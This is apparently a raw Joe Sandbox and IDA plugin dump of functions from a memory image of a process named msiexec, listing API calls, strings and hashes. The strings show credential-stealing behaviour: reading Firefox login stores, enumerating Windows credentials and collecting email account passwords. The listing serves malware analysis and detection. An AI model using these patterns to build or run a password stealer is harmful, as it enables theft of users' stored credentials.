                                                                                          • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                          • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                          • API String ID: 633282248-1996832678
                                                                                          • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                          • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                          • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                          • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                          • API String ID: 3402215030-3842416460
                                                                                          • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                          • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                          APIs
                                                                                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                            • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                            • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                          • strlen.MSVCRT ref: 0040F139
                                                                                          • strlen.MSVCRT ref: 0040F147
                                                                                          • memset.MSVCRT ref: 0040F187
                                                                                          • strlen.MSVCRT ref: 0040F196
                                                                                          • strlen.MSVCRT ref: 0040F1A4
                                                                                          • memset.MSVCRT ref: 0040F1EA
                                                                                          • strlen.MSVCRT ref: 0040F1F9
                                                                                          • strlen.MSVCRT ref: 0040F207
                                                                                          • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                          • API String ID: 2003275452-3138536805
                                                                                          • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                          • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040C3F7
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                          • strrchr.MSVCRT ref: 0040C417
                                                                                          • _mbscat.MSVCRT ref: 0040C431
                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                          • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                          • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                          • API String ID: 1012775001-1343505058
                                                                                          • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                          • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00444612
                                                                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                          • strlen.MSVCRT ref: 0044462E
                                                                                          • memset.MSVCRT ref: 00444668
                                                                                          • memset.MSVCRT ref: 0044467C
                                                                                          • memset.MSVCRT ref: 00444690
                                                                                          • memset.MSVCRT ref: 004446B6
                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                          • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                          • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                          • String ID: salu
                                                                                          • API String ID: 3691931180-4177317985
                                                                                          • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                          • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                          • API String ID: 2449869053-232097475
                                                                                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                          APIs
                                                                                          • sprintf.MSVCRT ref: 0040957B
                                                                                          • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                          • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                          • sprintf.MSVCRT ref: 004095EB
                                                                                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                          • memset.MSVCRT ref: 0040961C
                                                                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                          • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                          • String ID: caption$dialog_%d$menu_%d
                                                                                          • API String ID: 3259144588-3822380221
                                                                                          • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                          • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                          • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                          • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                          APIs
                                                                                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                          • API String ID: 2449869053-4258758744
                                                                                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                          APIs
                                                                                          • wcsstr.MSVCRT ref: 0040426A
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                          • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                          • strchr.MSVCRT ref: 004042F6
                                                                                          • strlen.MSVCRT ref: 0040430A
                                                                                          • sprintf.MSVCRT ref: 0040432B
                                                                                          • strchr.MSVCRT ref: 0040433C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                          • String ID: %s@gmail.com$www.google.com
                                                                                          • API String ID: 3866421160-4070641962
                                                                                          • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                          • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                          • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                          • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                          • API String ID: 2360744853-2229823034
                                                                                          • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                          • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                          • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                          • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                          APIs
                                                                                          • strchr.MSVCRT ref: 004100E4
                                                                                          • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                          • _mbscat.MSVCRT ref: 0041014D
                                                                                          • memset.MSVCRT ref: 00410129
                                                                                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                            • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                          • memset.MSVCRT ref: 00410171
                                                                                          • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                          • _mbscat.MSVCRT ref: 00410197
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                          • String ID: \systemroot
                                                                                          • API String ID: 912701516-1821301763
                                                                                          • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                          • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                          • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                          • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                          APIs
                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                          • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                          • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                          • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                            • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                          • API String ID: 888011440-2039793938
                                                                                          • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                          • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                          • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                          • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                          APIs
                                                                                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                          • strchr.MSVCRT ref: 0040327B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileStringstrchr
                                                                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                          • API String ID: 1348940319-1729847305
                                                                                          • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                          • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                          • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                          • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                          • API String ID: 3510742995-3273207271
                                                                                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040F567
                                                                                          • memset.MSVCRT ref: 0040F57F
                                                                                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                          • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 78143705-3916222277
                                                                                          • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                          • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                          • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                          • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004094C8
                                                                                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                          • memset.MSVCRT ref: 0040950C
                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                          • _strcmpi.MSVCRT ref: 00409531
                                                                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                          • String ID: sysdatetimepick32
                                                                                          • API String ID: 3411445237-4169760276
                                                                                          • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                          • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                          • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                          • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00403504
                                                                                          • memset.MSVCRT ref: 0040351A
                                                                                          • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                          • _mbscat.MSVCRT ref: 0040356D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbscatmemset$_mbscpystrlen
                                                                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                          • API String ID: 632640181-966475738
                                                                                          • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                          • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                          • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                          • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                          APIs
                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
